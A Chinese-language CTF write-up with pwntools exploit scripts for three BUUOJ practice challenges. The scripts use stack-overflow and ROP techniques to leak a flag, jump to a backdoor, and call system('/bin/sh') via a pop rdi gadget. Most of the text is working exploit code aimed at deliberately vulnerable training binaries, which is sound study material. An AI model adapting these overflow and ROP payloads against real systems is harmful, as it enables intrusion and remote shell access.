not_the_same_3dsctf_2016
一开始看到这两个函数,直接栈溢出,跳过来不就行了,,,没注意看,get_secret,是指将flag读入了f14g,并没有打印出来呢,所以我们还需要自己打印一下
搜了一下,有write函数,那就调用它
#coding=utf-8
from pwn import *
connect = 1#连接本地
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='29206'#IP地址
main_addr = 0x080489E0
secret_addr = 0x080489A0
write_addr = 0x0806E270
fl4g = 0x080ECA2D
if connect:
p=remote(port,ip)
else :
p=process("./"+fileName+"")
#p.recvuntil("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ")
#跳到get_secret,先让flag读入,最后返回main
p.sendline("a"*0x2d+p32(secret_addr)+p32(main_addr))
#调用write函数读出
p.sendline("a"*0x2d+p32(write_addr)+p32(main_addr)+p32(1)+p32(fl4g)+p32(0x100))
p.interactive()
jarvisoj_level0
一道简单的栈溢出,也给了后门函数
覆盖量为0x80,还有ebp,接下来加上后面函数的地址即可
#coding=utf-8
from pwn import *
connect = 1#连接
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='26257'#IP地址
if connect:
p=remote(port,ip)
else :
p=process("./"+fileName+"")
p.recvuntil("d")
p.sendline("s"*0x80+p64(0x0)+p64(0x0400596))
#p.sendline("s"*0x80+p64(0x0400596))
p.interactive()
p.interactive()
[HarekazeCTF2019]baby_rop
emmm,又一道超级简单的水题,,,,
输入没有控制大小,可以溢出,覆盖率为0x10+0x8
程序里面有system和binsh,组合一下就可以
因为是64位的程序,用寄存器传值,所以还要找一个pop rdi;ret
然后就可以写exp了
#coding=utf-8
from pwn import *
connect = 1#连接
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='25312'#IP地址
if connect:
p=remote(port,ip)
else :
p=process("./"+fileName+"")
system_addr = 0x000400490
binsh_addr = 0x0601048
rdi_addr = 0x000400683
ret_addr = 0x040061A
p.recvuntil("name?")
payload='a'*0x10+p64(0x0)#覆盖量
payload+=p64(rdi_addr)
payload+=p64(binsh_addr)#将binsh进入寄存器
payload+=p64(system_addr)#调用system函数
payload+=p64(ret_addr)#可加可不加
payload+=p64(0x04005D6)#返回地址,main,可以有可没有
p.sendline(payload)
p.interactive()